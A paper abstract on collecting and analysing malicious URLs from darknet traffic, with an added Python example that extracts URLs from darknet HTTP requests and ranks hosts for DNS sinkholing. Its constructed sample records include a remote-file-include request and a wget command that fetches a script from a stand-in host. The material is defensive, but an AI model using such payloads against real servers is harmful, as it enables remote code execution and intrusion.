http://dx.doi.org/10.13089/JKIISC.2014.24.6.1185

A Study on Collection and Analysis Method of Malicious URLs Based on Darknet Traffic for Advanced Security Monitoring and Response  

Kim, Kyu-Il (Korea Institute of Science and Technology Information)
Choi, Sang-So (Korea Institute of Science and Technology Information)
Park, Hark-Soo (Korea Institute of Science and Technology Information)
Ko, Sang-Jun (Korea Institute of Science and Technology Information)
Song, Jung-Suk (Korea Institute of Science and Technology Information)
Abstract
Domestic and international CERTs provide security monitoring and response services, built on security devices, to prevent intrusion incidents and minimize damage to the organizations they protect. These services have a fundamental limitation, however: they cannot detect unknown attacks that do not match predefined signatures. Recently, many approaches have adopted the darknet technique to overcome this limitation. A darknet is a set of unused IP addresses, so no real systems are connected to it, and all traffic arriving at the darknet can therefore be regarded as attack activity. In this paper, we present a method for collecting and analyzing malicious URLs from darknet traffic for advanced security monitoring and response. The proposed method prepared a darknet space of 8,192 IP addresses, extracted all URLs from the darknet traffic, and carried out an in-depth analysis of the extracted URLs. The analysis results can contribute to emergency response to large-scale cyber threats, and applying the malicious URLs to security devices, a DNS sinkhole service, etc. can improve the performance of security monitoring and response.
Keywords
Darknet; Security Monitoring and Response; Malicious URLs;
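The extraction step the abstract describes, as an added example written for this page rather than the authors' implementation: it takes reassembled TCP payloads sent to a darknet block, keeps only HTTP requests, records both the URL each sender asked for and any URLs embedded in the query string or body (the remote-file-include pattern; that the authors counted such embedded URLs is an assumption), normalizes them, counts distinct sources per URL, and ranks named hosts for a DNS sinkhole. The darknet prefix 10.32.0.0/19 (8,192 addresses, the same size as the paper's space, but a hypothetical block) and every sample packet below are constructed.

```python
"""Added example for this page (not the authors' code): pull URLs out of HTTP
requests that land on a darknet block and rank the named hosts for a DNS
sinkhole.  The darknet prefix and every packet below are constructed."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit, urlunsplit

# Hypothetical monitored darknet: a /19, i.e. 8,192 unused addresses.
DARKNET = ipaddress.ip_network("10.32.0.0/19")

REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|OPTIONS)\s+(\S+)\s+HTTP/1\.[01]\r?\n")
EMBEDDED_URL = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def parse_http_request(payload):
    """Split a raw TCP payload into (method, target, headers, body); None if not HTTP."""
    m = REQUEST_LINE.match(payload)
    if not m:
        return None
    rest = payload[m.end():]
    head, sep, body = rest.partition(b"\r\n\r\n")
    if not sep:  # tolerate bare-LF requests from sloppy scanners
        head, _, body = rest.partition(b"\n\n")
    headers = {}
    for line in head.decode(errors="replace").splitlines():
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return (m.group(1).decode(), m.group(2).decode(errors="replace"),
            headers, body.decode(errors="replace"))


def normalize_url(raw):
    """Lower-case scheme and host, drop default ports and fragments so duplicates collapse."""
    p = urlsplit(raw)
    scheme, netloc = p.scheme.lower(), p.netloc.lower()
    for s, port in (("http", ":80"), ("https", ":443")):
        if scheme == s and netloc.endswith(port):
            netloc = netloc[:-len(port)]
    return urlunsplit((scheme, netloc, p.path or "/", p.query, ""))


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def extract_urls(src, dst, dport, payload):
    """Return [(kind, url)] for one packet: 'request' = the URL the sender asked for,
    'embedded' = URLs carried in the query string or body (e.g. remote-include attempts)."""
    if ipaddress.ip_address(dst) not in DARKNET:
        return []  # not darknet traffic: a real host may legitimately receive it
    parsed = parse_http_request(payload)
    if parsed is None:
        return []
    method, target, headers, body = parsed
    if target.lower().startswith(("http://", "https://")):
        request_url = target  # proxy-style absolute URI, typical of open-proxy scanners
    else:
        host = headers.get("host") or (dst if dport == 80 else f"{dst}:{dport}")
        request_url = f"http://{host}{target}"
    found = [("request", normalize_url(request_url))]
    text = unquote(urlsplit(target).query) + "\n" + unquote(body)
    found += [("embedded", normalize_url(u)) for u in EMBEDDED_URL.findall(text)]
    return found


def collect(records):
    """Index every URL by the kinds it was seen as and the distinct sources that sent it."""
    index = defaultdict(lambda: {"kinds": set(), "sources": set()})
    for src, dst, dport, payload in records:
        for kind, url in extract_urls(src, dst, dport, payload):
            index[url]["kinds"].add(kind)
            index[url]["sources"].add(src)
    return dict(index)


def sinkhole_candidates(index):
    """Named hosts (a DNS sinkhole cannot act on IP literals) ranked by distinct sources."""
    hits = defaultdict(set)
    for url, info in index.items():
        host = urlsplit(url).hostname
        if host and not is_ip_literal(host):
            hits[host] |= info["sources"]
    return sorted(hits.items(), key=lambda kv: (-len(kv[1]), kv[0]))


# Constructed sample: (src, dst, dst_port, first TCP payload) reassembled from a darknet capture.
SAMPLE_RECORDS = [
    ("198.51.100.7", "10.32.5.9", 80,
     b"GET /index.php?page=http://EVIL.example/bot.txt HTTP/1.1\r\nHost: 10.32.5.9\r\n\r\n"),
    ("198.51.100.8", "10.32.17.2", 8080,
     b"GET http://evil.example/bot.txt HTTP/1.1\r\nHost: evil.example\r\n\r\n"),
    ("198.51.100.9", "10.32.0.44", 80,
     b"POST /cgi-bin/php HTTP/1.1\r\nHost: 10.32.0.44:80\r\nContent-Length: 50\r\n\r\n"
     b"cmd=wget%20http%3A%2F%2Fdrop.example%3A8081%2Fx.sh"),
    ("198.51.100.10", "10.32.3.3", 22, b"SSH-2.0-libssh\r\n"),                          # not HTTP
    ("198.51.100.11", "192.0.2.10", 80, b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"),  # not darknet
    ("198.51.100.12", "10.32.9.1", 80, b"GET /phpmyadmin/ HTTP/1.1\r\n\r\n"),          # no Host header
]

if __name__ == "__main__":
    index = collect(SAMPLE_RECORDS)
    for url, info in sorted(index.items()):
        print(f"{len(info['sources'])} src  {','.join(sorted(info['kinds'])):17} {url}")
    for host, sources in sinkhole_candidates(index):
        print(f"sinkhole candidate: {host} (seen from {len(sources)} sources)")
```

Run it as a script to print the URL index and the candidate list. Two design points: the destination check keeps the parser honest if the capture is mixed with production traffic, since only requests to unused addresses carry the "nobody should be talking to this" guarantee; and IP-literal hosts are left out of the sinkhole list because a DNS sinkhole can only act on names. A host seen from a single source is weak evidence, so the list still needs review before it is pushed to security devices.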